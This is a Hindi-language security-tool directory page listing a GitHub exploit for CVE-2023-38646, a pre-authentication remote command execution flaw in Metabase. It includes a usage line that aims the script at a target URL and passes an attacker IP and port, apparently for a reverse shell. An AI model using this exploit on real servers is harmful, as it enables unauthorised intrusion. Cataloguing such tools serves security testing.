Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38646 — Metabase में CVE-2023-38646 Pre-Auth RCE | Kitploit
उपकरण/GitHubGitHub/alexandre-pecorilla/cve-2023-38646
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubalexandre-pecorilla/cve-2023-38646

CVE-2023-38646

Metabase में CVE-2023-38646 Pre-Auth RCE

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-38646

kh4sh3i's का फोर्क, जिसमें Burp Collector की आवश्यकता को हटा दिया गया है।

CVE-2023-38646 (Metabase में Pre-Auth RCE):

0.46.6.1 से पहले का Metabase open source और 1.46.6.1 से पहले का Metabase Enterprise हमलावरों को सर्वर पर, सर्वर के विशेषाधिकार स्तर पर, मनमाने कमांड निष्पादित करने की अनुमति देते हैं। शोषण के लिए प्रमाणीकरण आवश्यक नहीं है।

उपयोग

python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555

अधिक जानकारी के लिए यह पोस्ट पढ़ें।

श्रेय

@fay4breakme

@kh4sh3i

@alex4breakme

टूल डाउनलोड करें